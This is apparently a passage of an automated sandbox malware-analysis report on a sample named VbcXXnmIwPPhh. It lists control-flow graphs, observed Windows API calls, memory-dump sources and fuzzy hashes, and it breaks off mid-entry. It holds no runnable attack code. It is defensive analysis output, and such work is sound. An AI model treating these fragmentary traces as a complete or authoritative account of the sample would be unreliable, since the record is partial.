308b2e0 GetModuleHandleW 17988->17989 17990 308b30d 17989->17990 17990->17984
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fb667e1c3bcda758844ecb262bc246ea0ff193e3f2867ca1e45af706c6dd07b
                                                              • Instruction ID: a577964a05506cb019464f16fcd4a97ac445019b524ec3f8f388ac5c4bae4356
                                                              • Opcode Fuzzy Hash: 0fb667e1c3bcda758844ecb262bc246ea0ff193e3f2867ca1e45af706c6dd07b
                                                              • Instruction Fuzzy Hash: 6051F371E056199BEB28DFA6C8447E9FBF6BF89300F5481EAD409A6250EB701A85DF40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 319 308b0a8-308b0b7 320 308b0b9-308b0c6 call 3089b14 319->320 321 308b0e3-308b0e7 319->321 328 308b0c8 320->328 329 308b0dc 320->329 322 308b0e9-308b0f3 321->322 323 308b0fb-308b13c 321->323 322->323 330 308b149-308b157 323->330 331 308b13e-308b146 323->331 376 308b0ce call 308b340 328->376 377 308b0ce call 308b331 328->377 329->321 333 308b159-308b15e 330->333 334 308b17b-308b17d 330->334 331->330 332 308b0d4-308b0d6 332->329 335 308b218-308b296 332->335 337 308b169 333->337 338 308b160-308b167 call 308ad10 333->338 336 308b180-308b187 334->336 369 308b298-308b29c 335->369 370 308b29d-308b2d8 335->370 340 308b189-308b191 336->340 341 308b194-308b19b 336->341 339 308b16b-308b179 337->339 338->339 339->336 340->341 344 308b1a8-308b1b1 call 308ad20 341->344 345 308b19d-308b1a5 341->345 350 308b1be-308b1c3 344->350 351 308b1b3-308b1bb 344->351 345->344 352 308b1e1-308b1ee 350->352 353 308b1c5-308b1cc 350->353 351->350 360 308b1f0-308b20e 352->360 361 308b211-308b217 352->361 353->352 355 308b1ce-308b1de call 308ad30 call 308ad40 353->355 355->352 360->361 369->370 371 308b2da-308b2dd 370->371 372 308b2e0-308b30b GetModuleHandleW 370->372 371->372 373 308b30d-308b313 372->373 374 308b314-308b328 372->374 373->374 376->332 377->332
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0308B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 37fb948168860d558b231beb192173d0042a56d67110604f32d914498ebe1612
                                                              • Instruction ID: 8fd405b7b0082997a8283afab40c7f10a032f56771acf398e64b492ef3a66cc8
                                                              • Opcode Fuzzy Hash: 37fb948168860d558b231beb192173d0042a56d67110604f32d914498ebe1612
                                                              • Instruction Fuzzy Hash: B5714870A01B058FDB64EF2AD44179BBBF1FF88604F04892DD48ADBA50D775E846CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 378 308590c-308590e 379 3085910-3085914 378->379 380 3085915-3085916 378->380 379->380 381 3085918-308591c 380->381 382 308591d-30859d9 CreateActCtxA 380->382 381->382 384 30859db-30859e1 382->384 385 30859e2-3085a3c 382->385 384->385 392 3085a4b-3085a4f 385->392 393 3085a3e-3085a41 385->393 394 3085a60 392->394 395 3085a51-3085a5d 392->395 393->392 397 3085a61 394->397 395->394 397->397
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 030859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 77438676d470b47ca2a319f33e4165f433e8530ca10e075f54b27e9661b15d5d
                                                              • Instruction ID: 08bee98c7ef5f0402d9cc40adbc9cb711452c9b291e886c6c6566ec49c627950
                                                              • Opcode Fuzzy Hash: 77438676d470b47ca2a319f33e4165f433e8530ca10e075f54b27e9661b15d5d
                                                              • Instruction Fuzzy Hash: 0041DDB1C017198BDB24DFA9C884BDEBBF5BF49304F24806AD448AB251DB756946CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 398 30844b4-30859d9 CreateActCtxA 402 30859db-30859e1 398->402 403 30859e2-3085a3c 398->403 402->403 410 3085a4b-3085a4f 403->410 411 3085a3e-3085a41 403->411 412 3085a60 410->412 413 3085a51-3085a5d 410->413 411->410 415 3085a61 412->415 413->412 415->415
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 030859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 48e81abc00675616c464884f228b29d668744f8d3defdb2cf9f1bac07057ca1b
                                                              • Instruction ID: 7ea8fa23421e4145dd2b2babb7a137a5bca015d166321863d7ffad1c16796607
                                                              • Opcode Fuzzy Hash: 48e81abc00675616c464884f228b29d668744f8d3defdb2cf9f1bac07057ca1b
                                                              • Instruction Fuzzy Hash: 5C41CEB1C01729CBDB24DFA9C884BCEBBF5BF49304F24846AD448AB251DB756946CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 416 308d0b8-308d61c DuplicateHandle 419 308d61e-308d624 416->419 420 308d625-308d642 416->420 419->420
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308D54E,?,?,?,?,?), ref: 0308D60F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: cc5b6b82997b5bb442fefe66ce8d40359196bc427843e726d79496dbe519d397
                                                              • Instruction ID: 166b43cf18b4a4114efde8d9bca44ecd3cfe3fde95133bd51a903c9bf00b714a
                                                              • Opcode Fuzzy Hash: cc5b6b82997b5bb442fefe66ce8d40359196bc427843e726d79496dbe519d397
                                                              • Instruction Fuzzy Hash: 052103B5D012089FDB10DFAAD884AEEFBF4EB48310F14841AE958A3350D378A950CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 423 308d581-308d586 424 308d588-308d58c 423->424 425 308d58d-308d61c DuplicateHandle 423->425 424->425 426 308d61e-308d624 425->426 427 308d625-308d642 425->427 426->427
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308D54E,?,?,?,?,?), ref: 0308D60F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a1aaa5bde2af330bfbb6ff2563a43a5df1de8262de1cf0bb297352044ff6f880
                                                              • Instruction ID: d56bc118e1078d3dcbbf5a424c32d03088a8410ce7c11047268b7fbf323c3729
                                                              • Opcode Fuzzy Hash: a1aaa5bde2af330bfbb6ff2563a43a5df1de8262de1cf0bb297352044ff6f880
                                                              • Instruction Fuzzy Hash: D521E4B5D012089FDB10DFAAD984ADEFBF4FB48314F14841AE958A3350D378A950CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 430 308b298-308b2d8 432 308b2da-308b2dd 430->432 433 308b2e0-308b30b GetModuleHandleW 430->433 432->433 434 308b30d-308b313 433->434 435 308b314-308b328 433->435 434->435
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0308B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 531d036cd02ac16b0440b9e80362e6a0b2c0301baf98d6db2f5781e9f36b3110
                                                              • Instruction ID: 0509983cc97b9c6a4f06bf052c65e806ed62e84909fbcf94ccaba665697a9c05
                                                              • Opcode Fuzzy Hash: 531d036cd02ac16b0440b9e80362e6a0b2c0301baf98d6db2f5781e9f36b3110
                                                              • Instruction Fuzzy Hash: C311E0B6C006498FDB24DF9AC444BDEFBF4AF88324F14841AD469A7610C379A545CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 ab11760-ab117ca PostMessageW 443 ab117d3-ab117e7 442->443 444 ab117cc-ab117d2 442->444 444->443
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AB117BD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 6aa8cf82b7fb47d9956338bfb7b633c136e4983e51b4cb4d30254a3420639911
                                                              • Instruction ID: ece6b7b27410a7781902a83c4a3ec016b9df7133405395a6d428d5065c0eedf7
                                                              • Opcode Fuzzy Hash: 6aa8cf82b7fb47d9956338bfb7b633c136e4983e51b4cb4d30254a3420639911
                                                              • Instruction Fuzzy Hash: B41103B58003489FDB20CF9AD884BDEBBF8EB48310F10841AE518A7700C379A544CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 437 ab11758-ab117ca PostMessageW 439 ab117d3-ab117e7 437->439 440 ab117cc-ab117d2 437->440 440->439
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AB117BD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: aa56efd9efb65317223eaa2a123f55093eaa789a7bc61fe88e6ee419019151d1
                                                              • Instruction ID: 301b0a45018817d1083e726b9e7ebd073729492675743f71b004a2aa8c43de94
                                                              • Opcode Fuzzy Hash: aa56efd9efb65317223eaa2a123f55093eaa789a7bc61fe88e6ee419019151d1
                                                              • Instruction Fuzzy Hash: 761106B98003588FDB10CF99D585BDEBBF4FB48320F10855AD524A7750C379A544CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2cfa185c0523f72dac286b381bd5e6f656932ac7c25110785566c9b0787bb2c
                                                              • Instruction ID: 7706555ea6087b856fbd0a2ef0147c6773950bc22cdaaca3de38dec34fa25acd
                                                              • Opcode Fuzzy Hash: e2cfa185c0523f72dac286b381bd5e6f656932ac7c25110785566c9b0787bb2c
                                                              • Instruction Fuzzy Hash: 9A210671504204EFDF15EF94D9C0F26BBA5FB88320F20C569ED090B286C336D416CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1267051520.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2fbd000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a43cfef3210e9e5e3427e6e424ab9ff39b904571b67e1c2e2ff8cd927c21f9af
                                                              • Instruction ID: df662180848f770e4b26dc0ab38e2dfd6535b703198394fd3a6c29cdc026c781
                                                              • Opcode Fuzzy Hash: a43cfef3210e9e5e3427e6e424ab9ff39b904571b67e1c2e2ff8cd927c21f9af
                                                              • Instruction Fuzzy Hash: A7212575A04300DFDB15DF20D9C0B56BBA1FF84794F20C56DEA0A0B24AC336D447CA62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1267051520.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2fbd000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14dee7c0fe9498bc16049aee0feb5cd64c13ea7c789d0e45904c5fb579ac346c
                                                              • Instruction ID: cc89cef8b52855e01df78d80cd81b6afcd8da399be48a1fbb7a6343cab099da4
                                                              • Opcode Fuzzy Hash: 14dee7c0fe9498bc16049aee0feb5cd64c13ea7c789d0e45904c5fb579ac346c
                                                              • Instruction Fuzzy Hash: 5F218E755093808FCB13CF20D994755BF71EF46214F28C5EAD9498F6A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
                                                              • Instruction ID: 4b8be4531fc9b7ce7f9ab0287065e54047cf85fcfd4dc2954facf1aee81de840
                                                              • Opcode Fuzzy Hash: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
                                                              • Instruction Fuzzy Hash: 9221DF76404244CFDB16DF54D9C4B16BFB2FB84324F24C6A9DD084B696C33AD426CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0be2d89373b0d997e62cfb2e3be12d4718ba8c33655d2140fa44fded60e75a41
                                                              • Instruction ID: c20357b7a357adc48596b0ee2b693e317a7a27375bdffcd044e9493a2c843d35
                                                              • Opcode Fuzzy Hash: 0be2d89373b0d997e62cfb2e3be12d4718ba8c33655d2140fa44fded60e75a41
                                                              • Instruction Fuzzy Hash: D001F7B1404384ABF7207E65CD84B66BBDCDF40225F188419ED0D4F2C2C6389840CAB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1266695594.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_198d000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5f7b307a81df1faf2659638948a5d7c07be46d2434e3a21f9a6504e8c203cf3
                                                              • Instruction ID: d58b96a4189e10ac9acb9ebfa61db6e02539f65a5d1cad0dff57765b16c59278
                                                              • Opcode Fuzzy Hash: e5f7b307a81df1faf2659638948a5d7c07be46d2434e3a21f9a6504e8c203cf3
                                                              • Instruction Fuzzy Hash: 7CF062B1404384AFE7249E1AC984B66FFDCEB85675F18C55AED0C4F293C3799844CA71
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0aba2201c476315b05c6ff69fcbe8f63cfad6959b14c86101e451bc3da1b9114
                                                              • Instruction ID: 6033450b20bfcc739c616f1a658c6a0d87780225be2778c21dc1d17967a21c60
                                                              • Opcode Fuzzy Hash: 0aba2201c476315b05c6ff69fcbe8f63cfad6959b14c86101e451bc3da1b9114
                                                              • Instruction Fuzzy Hash: 72D1BB717013008FDB69EF75C4907AEB7F6AF88600F9448AED1469F691EB35E902CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1268041661.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3080000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: afe36141662b34dc16e83bf799b2731671150162ebc85035830e314993b07072
                                                              • Instruction ID: d78d398f51e9ac6b417e6e3f62e13c236eda4ce336a740a605edef22d9dc1624
                                                              • Opcode Fuzzy Hash: afe36141662b34dc16e83bf799b2731671150162ebc85035830e314993b07072
                                                              • Instruction Fuzzy Hash: E3A17E36E1160A8FCF05EFB4D8805DEB7F2FF89300B1585AAE805AB265DB75E915CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1285114904.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ab10000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ec03380308418f63aa5a056dc961e38ef0431977ef97b4af9a658b71f74d3d9
                                                              • Instruction ID: a705aa3da15a347c5057cebff47c4104ec431e2b9f6a1683219a846806503ac0
                                                              • Opcode Fuzzy Hash: 8ec03380308418f63aa5a056dc961e38ef0431977ef97b4af9a658b71f74d3d9
                                                              • Instruction Fuzzy Hash: 0B2197B1D056288AEB28DF678D447DDFAF6AFC9301F44C1EA850CA6265DB340A859F01

                                                              Execution Graph

                                                              Execution Coverage:16.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:45%
                                                              Total number of Nodes:20
                                                              Total number of Limit Nodes:1
                                                              execution_graph 20411 168e018 20412 168e024 20411->20412 20415 6df2968 20412->20415 20416 6df298a 20415->20416 20417 168e0c3 20416->20417 20421 6df992c 20416->20421 20425 6df9543 20416->20425 20431 6df9548 20416->20431 20422 6df97e3 20421->20422 20423 6df9a69 LdrInitializeThunk 20422->20423 20424 6df9a81 20423->20424 20424->20417 20426 6df9548 LdrInitializeThunk 20425->20426 20430 6df9619 20426->20430 20428 6df96d9 20428->20417 20429 6df9a69 LdrInitializeThunk 20429->20428 20430->20428 20430->20429 20432 6df957e LdrInitializeThunk 20431->20432 20433 6df9579 20431->20433 20435 6df9619 20432->20435 20433->20432 20434 6df96d9 20434->20417 20435->20434 20436 6df9a69 LdrInitializeThunk 20435->20436 20436->20434

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 149 168c738-168c768 150 168c76a 149->150 151 168c76f-168c84c call 16841a0 call 1683cc0 149->151 150->151 161 168c84e 151->161 162 168c853-168c874 call 1685658 151->162 161->162 164 168c879-168c884 162->164 165 168c88b-168c88f 164->165 166 168c886 164->166 167 168c891-168c892 165->167 168 168c894-168c89b 165->168 166->165 169 168c8b3-168c8f7 167->169 170 168c89d 168->170 171 168c8a2-168c8b0 168->171 175 168c95d-168c974 169->175 170->171 171->169 177 168c8f9-168c90f 175->177 178 168c976-168c99b 175->178 182 168c939 177->182 183 168c911-168c91d 177->183 185 168c99d-168c9b2 178->185 186 168c9b3 178->186 184 168c93f-168c95c 182->184 187 168c91f-168c925 183->187 188 168c927-168c92d 183->188 184->175 185->186 189 168c937 187->189 188->189 189->184
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq$d
                                                              • API String ID: 0-3545145761
                                                              • Opcode ID: 78915fcbf9ff3d49f0d1364ab341659a5c5150d8fdad989e531b469f39460bca
                                                              • Instruction ID: cf39b45903a4f761c8267e428f2196f9744ce2aa0b2d67446a9c65d8b5790891
                                                              • Opcode Fuzzy Hash: 78915fcbf9ff3d49f0d1364ab341659a5c5150d8fdad989e531b469f39460bca
                                                              • Instruction Fuzzy Hash: 9581D474E00218DFEB14DFAAD984A9DBBF2BF88310F14C169E419AB365DB349945CF60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 193 168c146-168c158 194 168c15a-168c172 193->194 195 168c184 193->195 199 168c17b-168c17e 194->199 200 168c174-168c179 194->200 196 168c186-168c18a 195->196 201 168c18b-168c199 199->201 202 168c180-168c182 199->202 200->196 204 168c19b-168c1a1 201->204 205 168c1fe-168c205 201->205 202->194 202->195 206 168c1a3-168c1c8 204->206 207 168c206-168c20e 204->207 205->207 208 168c1ca 206->208 209 168c1cf-168c1f7 206->209 210 168c1f8-168c1fc 207->210 211 168c20f-168c2ac call 16841a0 call 1683cc0 207->211 208->209 209->210 210->205 222 168c2ae 211->222 223 168c2b3-168c2d4 call 1685658 211->223 222->223 225 168c2d9-168c2e4 223->225 226 168c2eb-168c2ef 225->226 227 168c2e6 225->227 228 168c2f1-168c2f2 226->228 229 168c2f4-168c2fb 226->229 227->226 230 168c313-168c357 228->230 231 168c2fd 229->231 232 168c302-168c310 229->232 236 168c3bd-168c3d4 230->236 231->232 232->230 238 168c359-168c36f 236->238 239 168c3d6-168c3fb 236->239 243 168c399 238->243 244 168c371-168c37d 238->244 245 168c3fd-168c412 239->245 246 168c413 239->246 249 168c39f-168c3bc 243->249 247 168c37f-168c385 244->247 248 168c387-168c38d 244->248 245->246 250 168c397 247->250 248->250 249->236 250->249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: 6c30f73fa55742aaae399ff1d1cc3b8d571a17d92a5bfe5d9bca700fd9d16c95
                                                              • Instruction ID: 408dcbf8556934dcd8e4ccd46f8d3245a2196641be0f526e379db805cad7285a
                                                              • Opcode Fuzzy Hash: 6c30f73fa55742aaae399ff1d1cc3b8d571a17d92a5bfe5d9bca700fd9d16c95
                                                              • Instruction Fuzzy Hash: 43A10B74E00218CFEB14DFA9D884A9DBBF2FF89310F148169E419AB365DB309946CF61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 254 1685362-1685364 255 16853c4-1685484 call 16841a0 call 1683cc0 254->255 256 1685366-16853a0 254->256 268 168548b-16854a9 255->268 269 1685486 255->269 257 16853a2 256->257 258 16853a7-16853c2 256->258 257->258 258->255 299 16854ac call 1685658 268->299 300 16854ac call 1685649 268->300 269->268 270 16854b2-16854bd 271 16854bf 270->271 272 16854c4-16854c8 270->272 271->272 273 16854ca-16854cb 272->273 274 16854cd-16854d4 272->274 275 16854ec-1685530 273->275 276 16854db-16854e9 274->276 277 16854d6 274->277 281 1685596-16855ad 275->281 276->275 277->276 283 16855af-16855d4 281->283 284 1685532-1685548 281->284 291 16855ec 283->291 292 16855d6-16855eb 283->292 288 168554a-1685556 284->288 289 1685572 284->289 293 1685558-168555e 288->293 294 1685560-1685566 288->294 290 1685578-1685595 289->290 290->281 292->291 295 1685570 293->295 294->295 295->290 299->270 300->270
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: 20fe63183499ac9497b5bc741333a346bcfd27ffd62a311aa8cc23beaac818a5
                                                              • Instruction ID: c8e5ef731aae47eff981238aee798f15854310a5361305f79cb7108c35f8ed83
                                                              • Opcode Fuzzy Hash: 20fe63183499ac9497b5bc741333a346bcfd27ffd62a311aa8cc23beaac818a5
                                                              • Instruction Fuzzy Hash: AD91D474E00218CFEB14DFAAD884A9DBBF2BF89310F14C169D409AB365DB349945CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 168c468-168c46d 302 168c46f-168c498 301->302 303 168c4d2-168c57c call 16841a0 call 1683cc0 301->303 304 168c49a 302->304 305 168c49f-168c4cc 302->305 315 168c57e 303->315 316 168c583-168c5a4 call 1685658 303->316 304->305 305->303 315->316 318 168c5a9-168c5b4 316->318 319 168c5bb-168c5bf 318->319 320 168c5b6 318->320 321 168c5c1-168c5c2 319->321 322 168c5c4-168c5cb 319->322 320->319 323 168c5e3-168c627 321->323 324 168c5cd 322->324 325 168c5d2-168c5e0 322->325 329 168c68d-168c6a4 323->329 324->325 325->323 331 168c629-168c63f 329->331 332 168c6a6-168c6cb 329->332 336 168c669 331->336 337 168c641-168c64d 331->337 338 168c6cd-168c6e2 332->338 339 168c6e3 332->339 342 168c66f-168c68c 336->342 340 168c64f-168c655 337->340 341 168c657-168c65d 337->341 338->339 343 168c667 340->343 341->343 342->329 343->342
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: 842c12e154425f2c66bb4964d0c6d952bed70673234c90e449b8f3b0e071fc44
                                                              • Instruction ID: 8d2b66512909871c9eda08b1feb40f067efb54f65223fa673ac048f6ea837c28
                                                              • Opcode Fuzzy Hash: 842c12e154425f2c66bb4964d0c6d952bed70673234c90e449b8f3b0e071fc44
                                                              • Instruction Fuzzy Hash: B781F674E00218CFEB14DFAAD884A9DBBF2BF88300F14C169D419AB365DB349985CF61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 347 168ca08-168ca38 349 168ca3a 347->349 350 168ca3f-168cb1c call 16841a0 call 1683cc0 347->350 349->350 360 168cb1e 350->360 361 168cb23-168cb44 call 1685658 350->361 360->361 363 168cb49-168cb54 361->363 364 168cb5b-168cb5f 363->364 365 168cb56 363->365 366 168cb61-168cb62 364->366 367 168cb64-168cb6b 364->367 365->364 370 168cb83-168cbc7 366->370 368 168cb6d 367->368 369 168cb72-168cb80 367->369 368->369 369->370 374 168cc2d-168cc44 370->374 376 168cbc9-168cbdf 374->376 377 168cc46-168cc6b 374->377 381 168cc09 376->381 382 168cbe1-168cbed 376->382 384 168cc6d-168cc82 377->384 385 168cc83 377->385 383 168cc0f-168cc2c 381->383 386 168cbef-168cbf5 382->386 387 168cbf7-168cbfd 382->387 383->374 384->385 388 168cc07 386->388 387->388 388->383
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
